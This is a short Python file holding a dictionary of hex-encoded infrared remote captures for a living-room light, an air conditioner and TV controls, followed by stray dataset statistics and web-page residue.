rf_commands = {
    # Living-room light / air conditioner power-off captures.
    'light/off': '2600500000012b9312131337131312131213131213121338133713131238133713131238133713131312133714371337143713121312131214371312131214111411143713371436140005610001294813000d050000000000000000',
    'aircon/off': '2600d6007f3d110e112c110f112c110e112c110f112c110e112c110f112c112c110e112c110f112c112c112c112c110e110f112c112c110e110f110e110f112c110e110e120e110e110f112c110e110f110e110e110f112c110e110f110e110f112b120e110e112c110f110e110f110e112c110f110e110e110f110e110f110e110e110f110e112c102d112c112c120e110e110f110e110f100f110e110f110e112c1010112c110e110f100f110e110f110e110f100f110e110f112c100f110f102d0f2e0f2e112c100f110f110e112c112c112c110f0e000d050000',
    # TV controls: power toggle, input select, channel and volume steps.
    'tv/power': '2600500000012695121311141113131212131213123811141138123812381238113911381213123812131238111411131238121312131213113911131238123812131238113812381200051a0001264b13000d050000000000000000',
    'tv/input': '260050000001289214111411141114111411131213361411143614361336143614361436141113361436143614361436131114111411141114111312131114111436143613361436140005170001284914000d050000000000000000',
    'tv/ch_up': '260050000001289314111410141114111411141114361410143614361436143514361436141114361435143614111436143614111311141114111411143614101411143614361436140005170001284914000d050000000000000000',
    'tv/ch_down': '260050000001279314111411141114111311141114361411143515351436143614361435151014361436143614351436143614111411141114101411141114111411143317351436140005170001284914000d050000000000000000',
    'tv/vol_up': '260050000001289214111411141114111411141015351411143614361435153514361436141114351510143614111436143515101411141114361411143514111411143614361435140005180001284616000d050000000000000000',
    'tv/vol_down': '260050000001289314111411141015101411141114361411143514361436143614351535141114361411143515351436143614111410151014361411141114101510143614361436140005170001284914000d050000000000000000',
}
| 171.909091
| 458
| 0.953993
| 30
| 1,891
| 59.966667
| 0.666667
| 0.004447
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.863124
| 0.014807
| 1,891
| 10
| 459
| 189.1
| 0.102523
| 0
| 0
| 0
| 0
| 0
| 0.952406
| 0.913802
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.